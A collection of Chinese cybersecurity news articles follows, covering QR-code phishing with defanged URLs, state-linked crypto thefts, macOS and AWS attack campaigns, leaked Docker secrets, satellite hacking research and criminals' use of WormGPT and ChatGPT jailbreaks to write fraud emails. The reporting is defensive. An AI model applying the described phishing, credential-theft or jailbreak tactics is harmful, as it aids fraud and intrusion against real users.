INKY解码了一个恶意二维码，查看它将收件人带到哪里。正如预测的那样，扫描二维码的受害者在不知情的情况下被带到一个网络钓鱼网站，这样他们的凭据就可以被盗取。他们很快觉得没有问题，因为嵌在二维码中的恶意链接含有收件人的电子邮件地址作为URL参数，一旦网络钓鱼网站加载，就会预先填充个人数据。简而言之，一切都似曾相识。 作为解码的一部分，我们将URL参数更改为“[email protected]”，在本例中，我们访问了hxxps://rtsp1[.][email protected]。 图4 rtsp1[.]com是一个新创建的域名，被设置为重定向到y7y[.]online，这是另一个新创建的域名，托管一个微软凭据收集网站。 图5 微软冒充网站接受了我们的虚假凭据。 图6 如你在下面所见，谷歌Chrome浏览器警告y7y[.]online收集了我们输入的虚假凭据。 图7 最终，钓鱼者将能够轻松获得易受攻击的、未加保护的受害者的凭据。 结语 不妨总结一下二维码网络钓鱼骗局中使用的一些策略。 技术概述 品牌冒充——使用知名品牌的元素，使电子邮件看起来好像来自这家公司。 凭据收集——当受害者以为自己登录到某一个资源网站，但实际上往攻击者拥有的对话框中输入凭据时就会出现这种活动。 基于图像的网络钓鱼——文本网络钓鱼信息嵌入到图像中。 二维码——将恶意URL隐藏起来，避免被收件人和安全软件发现。 最佳实践：指导和建议 只要被要求完成新的任务，收件人就应该使用不同的通信方式来确认。 仔细检查发件人的电子邮件地址。在本文中，电子邮件声称来自微软和收件人的雇主，但发件人的域名与这些实体毫无关系。 不要扫描来历不明的二维码。通过二维码访问的网站可能隐藏有利用漏洞或窃取敏感数据的恶意代码。 在使用二维码访问的网站上输入财务和个人信息时要小心。

朝鲜黑客组织Lazarus从Alphapo窃取价值6000万的加密货币。 区块链数据分析公司"ZackXBT"称Alphapo平台被黑与朝鲜黑客组织Lazarus有关，攻击者累计窃取了价值约6000万美元的加密货币。 Alphapo是一家为博彩、电子贸易、订阅服务和其他在线平台提供中心化加密货币支付服务提供商。7月23日，该平台遭遇网络攻击，初步预计被窃加密货币价值高达2300万美元。被窃的加密货币包括超过600万的USDT、10.8万的USDC、1亿FTN、43万TFL、2500 ETH、1700 DAI。这些加密货币都是从热钱包被窃的，因此大概率是由于私钥泄露导致的。 7月25日，"ZackXBT"称通过分析发现，攻击者还窃取了价值超过3700万的TRON和比特币，累计被窃加密货币价值达到6000万美元。 图 ZackXBT推特内容 ZackXBT称，攻击者可能是朝鲜黑客组织Lazarus，因为Lazarus在链上留下了独一无二的指纹信息。 Lazarus是一个与朝鲜政府有关联的黑客组织，与多次加密货币被窃事件有关，包括从Atomic钱包窃取了价值3500万美元的加密货币，从Harmony Horizon窃取了约1亿美元，从Axie Infinity窃取了约6.17亿美元。 Lazarus会使用虚假的工作录用通知诱惑加密货币公司的员工打开受感染的文件，然后入侵计算机，并窃取其中保存的账户凭证。攻击者还可以入侵受害者所在的公司网络，发起进一步攻击。 分析显示被窃的加密货币流入了Bitget、Bybit等加密货币交易所。而Lazarus也常使用小型的加密货币混币服务。区块链安全公司Halborn COO Dave Schwed也确认，此次攻击中攻击者可能窃取了用户钱包私钥，因此可以直接访问钱包。

Rustbucket 是一种全新类型的恶意软件，最近刚刚浮出水面，目前已对 macOS 设备构成了严重威胁。这种隐匿的间谍软件能悄无声息地感染 Mac 系统，而不会引起使用者的任何警觉。由于 Rustbucket 能够将自己伪装成安全的 PDF 查看器，因此这引起了大量的安全专家的注意。本文旨在向读者介绍 Rustbucket 的秘密、可能的来源以及用户为保护 macOS 计算机应采取的安全措施。 Rustbucket 因其隐蔽的渗透策略在网络安全界掀起了轩然大波。它将自己伪装成一个看似正常的 PDF 查看器，诱使用户在不知情的情况下允许它访问自己的 Macos 系统。一旦进入到了系统，恶意软件就会处于休眠状态，从而逃避安全软件和 Mac 用户的检测。专家们强调，Rustbucket 的技术非常复杂，能够悄无声息地收集用户的敏感信息，并在不被发现的情况下进行恶意的攻击活动。 研究人员目前已将 Rustbucket 与朝鲜国家支持的高级持续威胁（APT）攻击联系了起来。虽然目前还需要做进一步调查才能最终确认其来源，但它与以前观察到的朝鲜 APT 恶意软件的相似之处还非常明显。这一发现引起了人们对潜在的国家支持的网络间谍攻击活动的担忧，并凸显了提高 macOS 安全警惕性的必要性。 系统保护措施： 及时对软件进行更新：定期更新操作系统和应用程序有助于防止恶意软件利用已知漏洞。 谨慎对待电子邮件附件： 打开电子邮件附件时要谨慎，尤其是那些来源不明或可疑的附件。验证附件和发件人的合法性后再进行操作。 使用强大的安全软件：安装专为 macOS 系统设计的可靠的杀毒软件。定期更新和扫描设备，检测和清除潜在的威胁。 养成安全的浏览习惯：访问陌生网站或下载文件时要谨慎。坚持使用可信来源，并在提示安装第三方插件或应用程序时谨慎行事。 对于 macOS 用户来说，Rustbucket 会带来更加严重的安全风险，因为它会伪装成一个常用的 PDF 查看器，偷偷潜入他们的系统。Rustbucket 可能与朝鲜 APT 的攻击有关，它的秘密攻击行动引发了有关数据隐私和网络安全的问题。用户可以通过保持警惕、更新应用程序和使用强大的安全软件措施来保护自己的 macOS 设备免受 Rustbucket 和相关威胁的侵害。

研究人员发现，一个名为ScarletEel的有经济动机的威胁攻击者一直在渗透亚马逊网络服务（AWS）进行各种恶意活动。这些攻击活动包括窃取凭证和知识产权、部署加密挖矿软件以及进行分布式拒绝服务（DDoS）攻击。 ScarletEel最初是由云安全公司Sysdig在今年2月的一篇博文中进行披露的。研究人员发现该组织能够对AWS工具进行灵活的运用，并利用原生的AWS功能在云环境中进行有效的操作。并且通过获得适当的访问权限，ScarletEel然后会执行双重攻击策略，即植入加密挖矿软件，同时窃取知识产权。 针对Sysdig最近进行的分析显示，ScarletEel在不断完善它的战术并躲避云安全检测机制。该威胁行为体已将其能力扩展到针对AWS Fargate（一种相对未开发的计算引擎）。此外，ScarletEel还将DDoS即服务（DDoS-as-a-service）纳入到了其利用技术的范围。 Sysdig的威胁研究工程师Alessandro Brucato解释说，ScarletEel更善于针对受害者的环境，提高了利用漏洞的能力，同时很好的规避了客户实施的防御安全措施。 为了发起更多的网络攻击，ScarletEel利用了Kubernetes集群中的Jupyter notebook容器。攻击者利用脚本搜索AWS凭据，并将其发送回指挥控制（C2）服务器内。不过有趣的是，这些脚本使用了内置的shell命令，而不是使用命令行工具来隐蔽地窃取数据，从而避免了curl和wget等监控工具的检测。 ScarletEel也使用了Pacu（一种针对AWS的开源渗透测试工具）来识别受害者账户中的权限提升的漏洞。同时，该威胁行为者还使用了Peirates，这是一款专为探索和利用Kubernetes环境而定制的工具。 攻击者为了掩盖他们真实的活动痕迹，设计了一种巧妙的防御机制。他们没有直接与AWS进行交互，而是使用了支持AWS协议的俄罗斯服务器。通过使用本地的AWS命令，那么他们的恶意行为就会被掩盖。此外，由于这些活动是在俄罗斯服务器上进行的，因此在受害者的AWS CloudTrail日志中并没有被发现。 ScarletEel对云环境的攻击给传统的云安全措施带来了很大的挑战。例如，该威胁攻击者成功入侵了AWS Fargate，由于其有限的访问权限以及该工具主要在内部网络进行使用，AWS Fargate通常不被视为目标。Sysdig的威胁研究主管Michael Clark强调，我们需要采取积极的防御措施来对抗ScarletEel这样的设施。 他补充说，就像我们在这次攻击中看到的那样，他们最终还是进入了Fargate系统，并获得了它的凭证。因此，他们肯定意识到了这其中存在的问题，而且他们进行攻击可能只是时间问题。 Brucato解释说，要防范像ScarletEel这样的实体被攻击，必须首先要采取一些措施防止攻击者进入到你的环境。但如果他们已经进入到了你的内部网络环境中，因为现在他们已经变得越来越复杂，你还必须要实施有效的安全措施。这里，Clark强调了有效的云安全态势管理（CSPM）和云基础设施权限管理（CIEM）的价值。 Brucato总结道，现在仅仅通过一种方式进行网络保护还是不够的，因为现在的攻击者已经意识到了这一点。现在他们可以利用任何漏洞细节进行攻击。

上千个Docker hub镜像泄露认证密钥和私钥。 Docker Hub 是Docker社区的基于云的仓库，用于保存、分享和分发Docker镜像。这些容器创建的模板中包含在Docker中部署应用所有必要的软件代码、运行状态、库和环境变量、配置文件。 镜像密钥泄露 近日，德国亚琛工业大学(RWTH-Aachen University)研究人员发现上千个Docker Hub上的镜像暴露了机密密钥、软件、在线平台和用户。研究人员分析了Docker Hub中337171个镜像，聚集了1647300层的数据集，发现有8.5%的镜像（28621个Docker镜像）中包含敏感数据，包括52107个有效的私有密钥、3158个不同API秘密信息。 注：以上数据不包括测试密钥、示例API秘密和无效的匹配 图 暴露的密钥信息 暴露的密钥中95%是私钥，90%是API秘密，表明这可能是无意间泄露的。 受影响最大的是Docker Hub，秘密暴露的是9.0%，来自私有注册的进行暴露了6.3%的秘密。这一差异表明Docker hub用户对容器安全的理解不如搭建私有仓库的用户。 泄露密钥的使用 然后，研究人员利用泄露的密钥可以进行下一步攻击活动。研究人员根据暴露的私钥发现了22082个被入侵的证书，其中包括7546个私有CA签发的证书和1060个公有CA签发的证书。而这些CA签发的证书被大量用户使用，并且被广泛接受。截止论文发布，仍有141个CA签名的证书状态是有效的。 为进一步确定暴露的密钥的影响，研究人员通过Censys数据库分析发现有275269个主机使用这些被入侵的密钥。包括： 可能传输隐私敏感物联网数据的8,674 MQTT和 19 AMQP主机； 保存机密数据的6,672 FTP、426 PostgreSQL、3 Elasticsearch,和3 MySQL实例； 216台用户电信服务的SIP主机； 用于邮件服务的8,165 SMTP、1,516 POP3、1,798 IMAP服务器； 240 SSH服务器和24 Kubernetes实例，使用泄露的密钥可以引发远程shell访问、僵尸网络扩张、以及进一步数据访问。 对于API的暴露，研究发现大多数的容器(2,920个)属于亚马逊AWS这类云服务器提供商，其中部分属于Stripe这样的金融服务。 考虑到白帽伦理，研究人员未对服务终端验证暴露的API秘密，因此其对服务终端的影响尚不明确。

继谷歌、微软后，GitHub发布passkey测试预览版，支持无密码登录。 7月12日，GitHub宣布在其最新的公开预览版中引入了无密码认证功能，用户可以自主从安全密钥升级到passkey。 Passkeys是与计算机、智能手机等相关的个人设备，在减小数据泄露风险、应对钓鱼攻击、防止密码被窃等方面起着重要作用。用户使用passkey后无需使用密码和双因子认证。用户也可以使用个人可识别信息、生物认证方法等登陆应用和在线平台，如人脸识别、指纹等。通过无密码登录用户无需对每个APP和网站管理不同的密码，改善用户体验和提高安全性。 要激活账户的passkey，需要点击GitHub页面的个人信息。打开'Feature Preview'菜单，点击启用'Enable passkeys'选项。下次再使用安全密钥登录时，GitHub就会询问用户是否要升级到passkey。因为passkey是一种隐私保护的特征，在升级过程中可能会需要多次触发passkey，以确保升级了正确的凭证信息。 过去几年，GitHub通过双因子认证、登录警告、拦截被黑的密码使用、添加WebAuthn支持等方式加强账户安全。今年3月13日，GitHub就对所有应用开发者强制使用双因子认证。此次passkey的升级将为用户提供更加灵活、可靠、安全的认证方式。 在passkey的使用方面，谷歌在今年5月对所有谷歌账户支持passkey，允许用户在无需输入密码或第二步验证的情况下登入账户。6月，微软在Windows 11中也支持passkey，在Windows hello中添加了内置的passkey管理器，使得使用生物认证登录方式更加安全。

7月17日，在首届“安全平行切面大会”上，“安全平行切面联盟” (Aspect-Oriented Technology Alliance，简称AOTA )在会上正式成立。 该联盟在中国信息协会信息安全专业委员会指导下成立，由蚂蚁集团联合行业共同发起，将为行业安全实战对抗、网络安全保险、安全合规治理带来全新的能力，为网络安全、数据安全、个人信息保护构建全新的技术基础平台，有望引导行业建立全新的安全治理范式。 （从左至右）中国科学技术大学教授左晓栋，蚂蚁集团副总裁、首席技术安全官韦韬，中国信息协会信息安全专委会副主任赵进延，北京华云安信息技术有限公司CEO沈传宝 蚂蚁集团于2019年首次在业界提出安全平行切面体系理念，到如今“安全平行切面联盟”的成立，见证了蚂蚁集团从理念创新到实践落地，快速打造出面向企业数字生命体的新一代安全基础平台的突破能力，也通过“产、学、研、用”的深入融合，不断营造良性的产业生态。 中国科学技术大学网络空间安全学院教授左晓栋——完善的防御体系，才是支撑业务运行的关键 中国科学技术大学网络空间安全学院教授左晓栋表示，网络安全防御体系的研究，贯穿着整个网络安全技术的发展。站在安全角度，完善的网络安全防护体系需要包含安全防护、检测、响应、恢复功能以及对抗能力等要素。但事实上，网络安全的防护体系更需要支撑业务运行。 所以，网络安全产品技术本身的最初设计，需要改变原来的研发模式和思路，应该从应用角度出发，支持安全体系的部署，并且融合业务。安全平行切面体系恰恰在解决业务与安全矛盾的层面上，取得了重要突破。尤其是在数据安全领域，数据库、系统业务流以及数据流转等方面的处理，安全平行切面技术的应用效果非常明显。 中国信息协会信息安全专业委员会副主任赵进延——更多重视，更需协同，更重应用 中国信息协会信息安全专业委员会副主任赵进延说到，随着我们国家“三法一条例”的发布以及在各个行业的深入应用，数据安全在国家战略层面的重视程度更甚从前。 想要解决数据安全问题，需要多方的协同。政策法规是一方面，更多的是要有强有力的技术保护能力措施和方法，需要产业的支撑以及科研机构的参与和支持。只有大家齐抓共管、协同联动，才能够营造一个比较良好的市场环境，更好的促进切面技术融合与开放。 安全平行切面联盟的成立，为促进网络安全与数据安全产业“产、学、研、用”能力的深度融合，建立了一个跨行业、跨部门的合作机制和优质平台。在他看来，“用”是关键，应用场景产生应用价值，可以促进安全技术不断地升级迭代，最终由应用带动安全产业发展。 蚂蚁集团副总裁、首席技术安全官韦韬——融合且解耦，业务与安全共赢共生 安全平行切面体系作为一种创新的安全技术体系与思想，是实现“原生安全”的一条可行路径。在蚂蚁集团副总裁、首席技术安全官韦韬看来，之前的安全防护方式以“外挂式安全”为主，防护效果并不到位。伴随着业务复杂度的提升，越来越多的甲方用户意识到要将安全能力内嵌到应用系统内部的方式来提升安全防护效果，但安全和业务的紧密耦合，会由于业务模式的时间周期与安全的响应周期差别较大，而产生“绑腿走路”的安全困境。 因此，安全平行切面的第一要务就需要解决业务发展诉求与安全建设需求之间的矛盾点，将安全能力融入企业基础设施中并与业务解耦，使安全能力深入业务逻辑，同时实现双方的独立高速发展，在更高维度上实现持续的动态安全防护，独立、高效、精确地支撑安全可治可战任务。 另外从安全能力的建设视角来看，不同类型的安全企业以及应用，内部的开发系统会随着行业的技术不断演进，实际的业务场景非常复杂，它的碎片化问题非常严重。尤其是安全防护企业，需要在每一个小碎片上做很多定制性工作，成本远高于收益，无法形成正向循环。 而通过切面标准化的技术框架，可以为这种碎片化的环境提供一个标准化的支持，实现一致化开发部署和运维能力建设，能够大幅降低安全建设成本和未来安全产品之间互联互通的改造成本。 除此之外，在威胁对抗场景、合规治理场景以及网络安全保险场景等领域，切面也能够实现安全能力和效率的跨越式提升。 北京华云安信息技术有限公司创始人兼CEO沈传宝——看清安全的最终价值和目标 作为安全平行切面联盟首批成员单位及重要技术授权合作伙伴，北京华云安信息技术有限公司创始人兼CEO 沈传宝表示，华云安是一家聚焦攻击面管理的高新技术企业，实战攻防是切面非常重要的一个应用场景。 实战攻防，首先要“看清”保护目标，保护目标一定是业务、数据以及相关的数字资产。这是华云安做攻击面管理或者安全运营的价值。回到安全平行切面技术。在实战攻防过程中，首要保障目标就是用户的业务不受影响，切面技术在这其中承担着重要角色。切面有各种各样的切点，比如在主机上、在应用和终端上，基于切点可以深入到每一个业务系统的内部，更清楚地看到内部的资产、安全威胁以及风险。 通过切面技术的整合，在技术层面上，把业务和防御手段进行解耦；从保护目标的层面上，又能够把保护要求与业务深度吻合，切面在中间产生了一个巨大的价值。华云安将在实战攻防、数据安全、网络安全保险等方面，不断为联盟贡献创新技术和最佳实践。 行业专家观点集锦 @北京炼石网络技术有限公司CEO白小勇：安全防护重点从边界防御转向保护数据和应用。在技术演进路线上，从网络安全到数据安全，防护能力倾向从“外挂”到“内嵌”。切面安全在数据流动的切面上重建安全规则，能够实现安全与业务在技术上的解耦与能力融合。 @网商银行首席信息安全官张园超：在数字化转型过程中，面临风险敞口扩大、漏洞数量增加、攻击收益增加、威胁等级提高、安全与效率难平衡等安全挑战。基于切面，可以构建可信纵深防御，实现安全免疫，业务解耦、透视、智能评估以及精确管控。 @深圳红途科技有限公司CEO刘新凯：铸稳基于切面的数据流转观测底盘，可以梳理全域数据属性、分布、流转及使用情况，全自动化体现数据的全链路走向和真实运营情况。 @高德集团个人信息保护负责人冯庆辉：安全切面作用于APP运行时，基于切点的数据和逻辑处理，可以很好的解决端上隐私合规、风险感知、漏洞防护等问题。高德去年7月接入安全切面后，双端运行稳定，无故障。

一台计算机在天空中以每小时数万公里的速度飞行成百上千公里，不过它依然是一台计算机。而每台联网计算机都存在攻击面。 研究人员、敌对政府、甚至普通的网络犯罪分子早就展示了如何劫持卫星技术的控制和通信方面。就在去年俄罗斯地面入侵的当天，俄罗斯黑客导致乌克兰卫星互联网服务提供商Viasat出现服务中断。11月18日，亲俄黑客活动组织Killnet对SpaceX的“星链”（Starlink）系统进行了分布式拒绝服务（DDoS）攻击，该系统为乌克兰的断网地区提供连接。最近，瓦格纳集团声称对俄罗斯互联网提供商Dozor-Teleport的暂时中断负责。据推测，该集团是通过将恶意软件上传到多个卫星终端大搞破坏的。 很明显，我们可以破坏卫星链路，但卫星本身破坏得了吗？高空中的固件和软件破坏得了吗？它们同样暴露在威胁面前。 在下个月于拉斯维加斯举行的美国黑帽大会上，德国波鸿鲁尔大学的博士生Johannes Willbold将演示卫星如何可能被黑客肆意操纵（剧透一下：没有那么难。） 他承认：“当然存在隐蔽式安全（security by obscurity），但除此之外，许多卫星并没有采取任何其他措施来防止被滥用。” 卫星坚持隐蔽式安全 在今年早些时候发表的一篇论文中，Willbold和五位同事调查了代表17种不同型号卫星的19名工程师和开发人员。在17个受访者中，3个受访者承认没有实施任何措施来防止第三方入侵。5个受访者不确定或拒绝置评，而剩下的9个受访者确实采取了一些防御措施。然而，即使采取防御措施的受访者中也有一些没有把握——比如说，9个受访者中只有5个实施了某种访问控制。 Willbold说：“我们抬头观察的许多卫星都没有保护措施，防止有人操纵卫星，除了隐蔽式安全外。” 卫星制造商之所以能侥幸躲过威胁，是由于这个行业被封锁得太严密了。长期以来，业内专业人士长期充当看门人的角色，防止潜在的攻击者和安全分析师以任何方式窥视卫星系统。 Willbold及其团队直面这一现状。他们花了整整四个月的时间来招募这19个受访者。他们在论文中哀叹道：“总的来说，我们观察到受访者很不情愿透露关于卫星和安全方面的任何细节。” 问题是，卫星不再像以前看起来那样神秘莫测了。 卫星是由什么构成的？ Willbold解释道，可想而知，价格更贵、体积更大的卫星有各种非常专门化的抗辐射硬件，而进入到太空环境明确需要这类硬件。 然而大多数卫星都位于近地轨道（LEO），在这个轨道高度，攻击起来问题不大。 他解释道，近地轨道上的计算硬件与地球上的嵌入式硬件相似，因为既便宜又容易获得。比如说，你可能会发现普通的ARM板，就像地面上普通的嵌入式设备一样，这是为汽车行业制造的相同处理器。 在软件方面，卫星常常采用像VxWorks这样的实时操作系统，或甚至是基本的Linux，就像SpaceX的“星链”一样。近年来，卫星开始采用更多的现成开源组件，它们以诸多方式相连的通信和控制系统让人想起普通的企业网络。 这些熟悉的技术为入侵者打开了各种潜在的大门，比如通过现成组件攻击供应链。 或许，一条更省事的路径是通过敞开的通信链路劫持航天器。 黑客可以置办自己的超高频和甚高频地面站，便宜的一段两米长的抛物面天线不到1万美元。然后就可以与很多低地球轨道卫星进行联系了。 然而，一大障碍是时机问题。卫星链路已经很慢了，每次可以看到卫星10分钟。以每小时数万公里的速度飞行，一颗低轨道卫星可能每90分钟左右绕地球一周。 如果想增加与卫星联系的时间，那就需要多个地面站。如果你有足够多的地面站，最终可以一直与它进行联系，但这显然会变得非常昂贵。 黑客转向星空 卫星为我们生活中一些最关键也是最日常的方面提供保障。它们为我们提供全球定位系统和电视，帮助我们追踪和预测天气，并联系偏远地方的人员。工程师、研究员、农民和军事情报官员都依赖太空探测器。 后果显然取决于卫星的哪个部分实际遭到了攻击。想象一下攻击观测卫星的BUS系统，随后也许可以把攻击目标转移到载荷系统，然后可以窃取本不该访问的图像，甚至可以引入伪影或从图像删除伪影，就像数据操纵。 之后就会出现各种离奇的可能，特别是如果你考虑到引导航天器的推进器。比如说，未经授权的操作人员可以将卫星转向太阳，造成物理损坏和拒绝服务，或者他们可以改变卫星轨道，导致碰撞。 如果两个轨道匹配，至少有可能可以尝试撞击其他卫星，或者实际上可以危及轨道上的其他人。 卫星安全的未来 最依赖卫星的政府和军队站在卫星防御的最前线。 为了开始应对威胁，FBI和CISA在2022年3月建议卫星通信提供商实施基本的安全预防措施，比如加密、监控和打补丁。两个月后，美国太空部队的第6太空航天团新增了四个中队，以加强军事防御，并更新改造老化的卫星控制基础设施。美国国家标准与技术研究所（NIST）和MITRE以及非营利性政府承包商航空航天公司（Aerospace Corp.）制定了用于威胁建模和规划太空威胁对策的框架。 整个安全界也参与其中。6月6日，美国空军和太空部队与非营利性政府承包商航空航天公司合作举办了一场名为“卫星黑客活动”的竞赛，这是一场30小时的夺旗式卫星黑客竞赛，主题围绕轨道中的黑客沙箱Moonlighter。在其他地方，开发人员已测试了一种抗量子计算信道，用于传输进出航天器的数据。 没有人知道未来几年卫星安全将走向何方。 Willbold表示，太空行业已经存在了几十年。另一方面，几十年来一直以一种方式运作的东西很少在短时间内发生变化。

犯罪分子使用生成式AI工具发起商业邮件攻击。 生成式AI用于BEC攻击 随着ChatGPT等人工智能技术的进步，为商业邮件泄露攻击印日新的攻击向量。ChatGPT是一个复杂的人工智能模型，可以根据用户输入生成类似人类的文本。目前也有犯罪分子利用ChatGPT类技术自从生成高度可信的伪造邮件给受害者，增加攻击的成功性。 图 发送BEC的黑客指南 近日，在某犯罪论坛出现了上图所示的讨论帖。其中展示了利用生成式人工智能技术应用于钓鱼攻击或BEC攻击的可行性。帖子建议邮件使用受害者的本地语言、翻译、然后再反馈给ChatGPT这样的接口以增强其复杂性和形式化。该方法表明攻击者即使不熟悉受害者的语言，也可以进行钓鱼或BEC攻击。 图 黑客论坛 黑客论坛还有关于ChatGPT类接口越狱的讨论，即通过精心伪造的输入来操作ChatGPT类应用接口生成泄露敏感信息、不适当内容、有甚至有害的代码的输出。 图 WormGPT 恶意攻击者创建了类似ChatGPT的定制模块，还进行广告展示。人工智能时代恶意活动的复杂性和适应能力不断增加，使得网络安全变得越来越具有挑战性。 WormGPT WormGPT是一款基于GPTJ语言模型的人工智能模块，具备很多的功能，包括无限制字符支持、代码格式能力。 图 WormGPT示例 WormGPT称在不同的数据源上进行了训练，尤其是很多恶意软件相关的数据。而训练过程中使用的数据集仍然是未公开的。 图 WormGPT数据源 研究人员利用WormGPT该工具进行实验，生成了一封欺骗账户管理员支付欺诈账单发票的邮件。 图 WormGPT创建的BEC攻击邮件 生成式人工智能技术应用于BEC攻击的优势 无语法错误：生成式人工智能技术生成的邮件一般没有语法错误，看起来像是合法的，减少了被标记为垃圾邮件的可能性。 降低准入门槛：使用生成式人工智能技术降低了发起复杂BEC攻击的准入门槛。即使攻击者能力不足也可以使用生成式人工智能技术生成垃圾邮件，并发起攻击。

新的研究表明，威胁分子可以灵活地快速迭代攻击模式，以绕过安全控制措施。 安全公司Proofpoint对最近一起针对美国一家智库的核安全专家的攻击进行了调查，揭示了资源丰富的攻击者如何迅速改变花招以攻击不同的机器。 在意识到最初的攻击载荷无法在Mac上奏效后，威胁分子迅速转而采用已知攻击使用苹果硬件的目标奏效的新技术。 在这起复杂的行动中，技术娴熟的威胁分子针对一个重要目标设计了一条看似无害的电子邮件链，并在数周内保持联络，以建立信任和融洽关系，然后趁机发动进一步的攻击。 攻击是如何发生的？ 2023年5月中旬的攻击来自TA453，这是一伙与伊朗政府有关联的威胁分子，被称为Charming Kitten（迷人小猫）、APT42、Mint Sandstorm和Yellow Garuda，他们冒充皇家联合军种研究所（RUSI）的成员。 这伙以从事间谍活动出名的攻击者利用多角色手法，向目标发送了一条电子邮件链，似乎要求收件人就一个名为“全球安全背景下的伊朗”项目给予反馈。 攻击者从不同的账户发送了多封邮件，所有邮件都相互引用参照，以营造一种真实感——这是在以前的电子邮件劫持活动中看到的一种技术。 在一次看似无害的交互之后，恶意的Google Script宏被投递，旨在将目标引到Dropbox URL。这个URL托管了一个由密码加密的.rar文件，该文件含有一个伪装成PDF但实际上是Windows LNK文件的释放器（dropper）。 自去年微软默认屏蔽VBA宏以来，使用LNK文件一直是网络攻击的标志。多年来，利用VBA宏一直是使用恶意制作的Microsoft 365文件安装恶意软件的首选方法。 Proofpoint表示：“使用.rar和LNK文件部署恶意软件有别于TA453使用VBA宏或远程模板注入的典型感染链。” “RAR中含有的LNK使用PowerShell从云托管提供商那里下载额外阶段的载荷。” 然而，目标使用的是苹果电脑，这意味着投递的文件无法运行。它试图投递的文件是一个刚被识别出来的基于PowerShell的后门，名为GorjolEcho。 一旦意识到GorjolEcho无法在macOS上运行，TA453随即转向在稍后的日期重新启动攻击，使用可以在苹果硬件上运行的移植版后门。 攻击者继续与目标进行看似正常的电子邮件对话，大约在最初企图基于Windows进行攻击一周后，他们用移植到苹果系统的后门重新发起了攻击。 在这种情况下，恶意软件通过一个由密码保护的ZIP文件来投递，该文件伪装成RUSI VPN解决方案和共享驱动器。 在与威胁分子进行一番交互之后，用户会被说服打开该文件。然后，一系列bash脚本将安装名为NokNok的后门。 Proofpoint判断，这是为了充当进一步指令的立足点，几乎可以肯定是PowerShell后门的移植版。 这起事件提醒人们，威胁分子的适应能力很强。在这个例子中，被发送的是LNK文件，而不是带有宏的Microsoft Word文档，并在机会出现时迅速移植到了macOS。 Mac恶意软件现状 随着苹果硬件在企业中越来越受欢迎，它也相应成为了更多威胁分子的目标。 尽管如此，据苹果管理专业公司Jamf声称，2022年新的恶意软件感染数量有所下降。 Malwarebytes在其2023年恶意软件现状报告中特别指出，虽然Mac恶意软件很少见，但确实存在。检测事件的机器中有11%被恶意软件感染。 然而，Jamf的组合策略副总裁Michael Covington表示，2023年是苹果安全界非常活跃的时期。 他说：“今年上半年，我们看到威胁领域出现了一些值得注意的动向，表明针对苹果设备的攻击在强度和目的方面都在发生变化。” “在此期间，我们看到了第一起专门针对macOS构建的勒索软件的真实例子。我们还看到了新的恶意软件在传播，它们可以追溯到政府撑腰的攻击者。它们使用了新颖的规避技术来避免检测，并绕过内置的平台保护措施潜伏下来。” Covington还注意到针对苹果处理器的加密货币劫持威胁在增加，而且针对高风险个人（主要是政府和媒体业的那些人）的间谍软件持续演变，但他也赞扬了苹果解决活跃漏洞所做的行动。 他还提醒了易受骗或分心的用户带来的风险，尤其是在网络钓鱼攻击方面。 Proofpoint的研究证明了威胁分子的适应能力、他们响应环境变化的能力以及不断发展的威胁领域。 Proofpoint的Joshua Miller说：“TA453能够并且愿意将资源投入到攻击目标的新工具，体现了与政府有关联的网络威胁持续存在。” “威胁分子不断努力迭代其感染链以绕过安全控制措施，表明基于强大社区的防御对于挫败最先进的对手有多么重要。”

2022年9月，工信部发布《国家车联网产业标准体系建设指南（智能网联汽车）（2022年版）（征求意见稿），预计到 2025 年，系统形成能够支撑组合驾驶辅助和自动驾驶通用功能的智能网联汽车标准体系，到 2030 年，全面形成能够支撑实现单车智能和网联赋能协同发展的智能网联汽车标准体系。在智能网联汽车系统中，车辆通过各种传感器、通信设备和计算资源连接到互联网，实现车辆与车辆、车辆与基础设施、车辆与用户之间的信息交互和数据共享。然而，这样的连接也带来了一系列安全风险，如恶意攻击、黑客入侵、数据泄露、远程操控等。 在此背景下，嘶吼安全产业研究院预计出品《先稽我智 安能动之：汽车智能网联安全调研报告 2023》意义深远，我们衷心希望，通过共同努力和创新，汽车智能网联安全行业能够蓬勃发展，为用户提供更安全、智能的出行体验，并为社会交通安全作出应有的贡献。 一、本报告研究内容 本报告具体内容包括如下四个方面： 1、汽车智能网联安全概述。 2、汽车智能网联安全产业SCP分析+市场调研。 本次报告通过SCP模型串联整个汽车智能网联安全产业情况，配合问卷调研+公开访谈。问卷调研聚焦汽车智能网联安全厂商+产品情况，具体包括汽车智能网联安全相关厂商情况评估、其产品情况评估和竞争能力评估等。 3、汽车智能网联安全未来趋势。结合调研问卷阐述汽车智能网联安全技术、创新等方面的趋势。 4、汽车智能网联安全典型厂商案例。 二、本报告预计发布时间 2023年10月 汽车智能网联安全调研报告发布会 三、本报告发布渠道 1、在嘶吼自媒体矩阵平台，包括但不限于微信公众号、官网、知乎、今日头条、网易等，进行报告发布宣传。 2、举办《先稽我智 安能动之：汽车智能网联安全调研报告 2023》报告发布会。 3、面向北京市政府、工信部、网络安全产业园区等领导定向赠阅。 4、面向嘶吼粉丝进行EDM定向推送。 四、本报告参与方式 关注公众号"嘶吼专业版"并回复“汽车智能网联安全问卷”获取《先稽我智 安能动之：汽车智能网联安全调研报告 2023》调研问卷。 嘶吼汽车智能网联安全调研期待您的参加！

7月17日，首届“安全平行切面大会”在北京举行。在中国信息协会信息安全专业委员会指导下，蚂蚁集团等联合发起的“安全平行切面联盟” (Aspect-Oriented Technology Alliance，简称AOTA )在会上正式成立并举行授牌仪式。该联盟是基于“安全平行切面”架构的技术生态联盟，将以定向授权的形式，向行业开放安全平行切面核心技术底座。同时将建立人才培养体系、技术标准体系和切面应用生态，与行业携手推动提升企业安全架构的实战性、稳定性、安全性和易用性。 中国科学院院士冯登国、清华大学网络研究院教授段海新、北京赛博英杰科技有限公司创始人谭晓生等院士专家发表致辞，对安全切面体系的发展与未来表示肯定和期待。同时，会上向平安科技、炼石网络、默安科技等首批 14家联盟成员单位，以及安天科技、中测安华、华云安、红途科技、浙江超限首批5家联盟技术授权单位代表进行授牌。 （图：7月17日，“安全平行切面联盟”正式成立） （从左至右）联盟特聘专家、中国科学技术大学教授左晓栋，联盟理事长、蚂蚁集团副总裁、首席技术安全官韦韬，指导单位中国信息协会信息安全专委会副主任赵进延，技术授权单位代表北京华云安信息技术有限公司CEO沈传宝 中国科学院院士 冯登国 